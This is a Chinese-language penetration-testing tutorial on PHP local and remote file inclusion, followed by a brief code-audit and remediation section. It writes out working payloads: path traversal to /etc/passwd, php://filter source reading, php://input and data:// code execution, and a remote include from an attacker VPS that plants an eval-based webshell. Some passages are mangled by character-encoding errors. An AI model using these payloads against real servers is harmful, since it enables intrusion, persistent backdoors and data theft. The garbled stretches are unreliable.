詳解PHP滲透測(cè)試文件包含漏洞與利用
什么是文件包含漏洞
文件包含,在網(wǎng)站開發(fā)人員開發(fā)網(wǎng)站時(shí),會(huì)將經(jīng)常重復(fù)的代碼寫道一個(gè)單獨(dú)的文件中,在別的文件中可以使用文件包含的函數(shù)來引用單獨(dú)的文件。目前很多語言都支持文件包含,例如php(inchude,require,inchude_once,require_once)等,,也就是包含文件包含函數(shù),其目的就是減少代碼重復(fù),提高代碼優(yōu)化效率,減少函數(shù)重復(fù)的使用。
文件包含產(chǎn)生的漏洞,因?yàn)橛羞@些文件包含的函數(shù),當(dāng)我們有一定權(quán)限(可讀)的時(shí)候,我們就可以利用文件包含函數(shù)包含我們語言指定的文件,或者是包含本地服務(wù)器中的文件。簡(jiǎn)而言之,當(dāng)php語言在引入文件時(shí),引用的文件名,用戶可控,由于傳入的文件名沒有經(jīng)過效驗(yàn),或者沒有經(jīng)過過濾被繞過,從而引用別的文件,導(dǎo)致的惡意代碼注入
文件包含漏洞的分類
大體可以分為:本地文件包含和遠(yuǎn)程文件包含。
遠(yuǎn)程文件包含:開啟條件,在php.ini配置文件中開啟allow_url_fopen和allow_url_include,包含文件是第三方文件
本地文件包含:就是本地服務(wù)器上的文件
一旦遠(yuǎn)程包含可以開啟,那么遠(yuǎn)程包含的漏洞比本地包含的漏洞更加的直接,危害也更加的大,可以隨意的包含任意主機(jī)的任意文件。
本地文件包含
顧名思義,引用本地文件,利用inchude包含函數(shù)包含本地(服務(wù)器)文件。
漏洞&利用
利用條件(以PHP為例)
1.inchude,等函數(shù)通過動(dòng)態(tài)變量引入
2.用戶能自動(dòng)控制動(dòng)態(tài)變量
什么是動(dòng)態(tài)變量?
我們可以這么理解,例如一個(gè)網(wǎng)站 http://127.0.0.1/inchude.php?in=../../../etc/passwd,那么此時(shí)的?in=../../../etc/passwd是我們動(dòng)態(tài)可以操作的變量
直接訪問文件
?xx=/etc/passwd #直接訪問passwd敏感文件
?xx=../../../etc/passwd
利用協(xié)議讀取源代碼
?xx=php://filter/read=convert.base64-encode/resource=xx.php #這樣能看到php文件的源碼
截?cái)?00
這里假設(shè)漏洞代碼為
<?php if(isset($_GET['shell'])) { include($_GET['shell'].".php"); //包含文件后會(huì)加上.php,并進(jìn)行訪問 }else{ include(index.php); } ?>
假設(shè)這樣正常的網(wǎng)站,我們上傳一個(gè)圖片馬文件為tpm.jpg,此時(shí)我們需要訪問圖片時(shí)網(wǎng)址就會(huì)報(bào)錯(cuò),此時(shí)url=http://127.0.0.1/index.php?shell=tpm.jpg.php,此時(shí)文件中并沒有該文件,此時(shí)我們就可以在.jpg后添加%00進(jìn)行截?cái)?,可能可以繞過。
條件:php.ini
中magic_quotes_qpc=off
并且PHP
版本< 5.3.4的情況。
長(zhǎng)度截?cái)?/h4>
漏洞代碼演示
<?php $file=$_GET['shell']; include($file.'.jpg'); ?>
與上面原理差不多,在1.txt中寫下
當(dāng)知曉對(duì)方服務(wù)器的而前提下,我們可以使用超出服務(wù)器的解析特征,進(jìn)行一個(gè)繞過。
條件:Windows長(zhǎng)度是‘/.’長(zhǎng)于256,Linux長(zhǎng)度是‘/.’長(zhǎng)于4096
PHP的偽協(xié)議
file://
作用:
訪問本地文件,在CTF中常用文件包含題型
條件:
allow_url_fopen=off/on
allow_url_inchude=off/on
實(shí)例:
文件的絕對(duì)路徑和文件名
http://127.0.0.1/include.php?file=file://C:\phpStudy\PHPTutorial\WWW\phpinfo.txt
文件的相對(duì)路徑和文件名
http://127.0.0.1/include.php?file=./phpinfo.txt
網(wǎng)絡(luò)路徑和文件名
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt
php://
作用:
php:// 訪問輸入輸出流(i/o)
這里介紹兩種常用類型:
php://filter 用于讀取源碼
php://input 用于執(zhí)行PHP代碼
條件:
allow_url_fopen=off/on
allow_url_inchude=off/on
實(shí)例
php://filter/read=convert.base64-encode/resource=[文件名] //base64讀取文件源碼
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php
php://input + POST執(zhí)行php代碼
http://127.0.0.1/include.php?file=php://input[POST DATA部分] <?php phpinfo(); ?>
如果具有一定的寫入權(quán)限,POST 寫入一句話木馬
<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>
data://
條件 :
allow_url_fopen=on
allow_url_inchude=on
作用:
在PHP>=5.2.0起,可以使用data://數(shù)據(jù)封裝器,傳遞數(shù)據(jù)相應(yīng)格式的數(shù)據(jù)
可以執(zhí)行PHP代碼
實(shí)例
#1.data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
#2.data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
phar://
phar://協(xié)議與zip://類似,同樣可以訪問zip格式壓縮包內(nèi)容
http://127.0.0.1/include.php?file=phar://C:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
利用條件 PHP > 5.3
要想使用Phar類里的方法,必須將phar.readonly
=on/off,利用 phar 協(xié)議可以拓展 php 反序列化漏洞攻擊面
遠(yuǎn)程文件包含
服務(wù)器通過PHP的函數(shù)去包含任意文件時(shí),由于要包含的這個(gè)文件過濾不嚴(yán)格,從而可以去包含一個(gè)惡意文件,從而達(dá)到攻擊的目的
漏洞利用
條件:
allow_url_include = OFF
allow_url_fopen = OFF
遠(yuǎn)程包含webshell
?xxx=http://攻擊者的VPS/shell.txt
#會(huì)在網(wǎng)站目錄生成名為 shell.php 的一句話木馬
shell.txt內(nèi)容為:
<?php fputs(fopen('./shell.php','w'),'<?php @eval($_POST[123]) ?>'); ?>
代碼審計(jì)
文件包含用到的函數(shù)
include() //使用此函數(shù),只有代碼執(zhí)行到此函數(shù)時(shí)才將文件包含進(jìn)來,發(fā)生錯(cuò)誤時(shí)只警告并繼續(xù)執(zhí)行。
inclue_once() //功能和前者一樣,區(qū)別在于當(dāng)重復(fù)調(diào)用同一文件時(shí),程序只調(diào)用一次。
require() //使用此函數(shù),只要程序執(zhí)行,立即調(diào)用此函數(shù)包含文件發(fā)生錯(cuò)誤時(shí),會(huì)輸出錯(cuò)誤信息并立即終止程序。
require_once() //功能和前者一樣,區(qū)別在于當(dāng)重復(fù)調(diào)用同一文件時(shí),程序只調(diào)用一次。
代碼審計(jì)的時(shí)候全局搜索以上函數(shù)
如果是基于圖像上傳的 ,要搜$_FILES
變量, 因?yàn)镻HP處理上傳文件的功能,基本都與$_FILES有關(guān)。
查看目錄結(jié)構(gòu),重點(diǎn)關(guān)注includes、modules等文件夾,查看index.php等文件是否動(dòng)態(tài)調(diào)用過這些內(nèi)容,變量是否可控。
修復(fù)建議
- 禁止遠(yuǎn)程文件包含
allow_url_include=off
- 配置
open_basedir=指定目錄
,限制訪問區(qū)域。 - 過濾
../
等特殊符號(hào) - 修改Apache日志文件的存放地址
- 開啟魔術(shù)引號(hào)
magic_quotes_qpc=on
- 盡量不要使用動(dòng)態(tài)變量調(diào)用文件,直接寫要包含的文件。
到此這篇關(guān)于詳解PHP滲透測(cè)試文件包含漏洞與利用的文章就介紹到這了,更多相關(guān)PHP文件漏洞與利用內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
深入解析PHP中逗號(hào)與點(diǎn)號(hào)的區(qū)別
大部分同學(xué)都知道逗號(hào)要比點(diǎn)號(hào)快,但就是不知道為什么,更不知道逗號(hào)與點(diǎn)號(hào)這兩者之間到底有什么區(qū)別。下面小編就來詳細(xì)的為大家介紹一下,需要的朋友可以過來參考下2013-08-08PHP同時(shí)連接多個(gè)mysql數(shù)據(jù)庫(kù)示例代碼
這篇文章主要介紹了PHP同時(shí)連接多個(gè)mysql數(shù)據(jù)庫(kù)的具體實(shí)現(xiàn),需要的朋友可以參考下2014-03-03PHP編程實(shí)現(xiàn)的TCP服務(wù)端和客戶端功能示例
這篇文章主要介紹了PHP編程實(shí)現(xiàn)的TCP服務(wù)端和客戶端功能,結(jié)合實(shí)例形式分析了php基于socket實(shí)現(xiàn)TCP服務(wù)器端與客戶端通信功能的相關(guān)配置、定義與使用技巧,需要的朋友可以參考下2018-04-04php面向?qū)ο笾衧tatic靜態(tài)屬性和靜態(tài)方法的調(diào)用
這篇文章主要介紹了php面向?qū)ο笾衧tatic靜態(tài)屬性和靜態(tài)方法的調(diào)用,實(shí)例分析了static靜態(tài)屬性和靜態(tài)方法的原理與調(diào)用技巧,需要的朋友可以參考下2015-02-02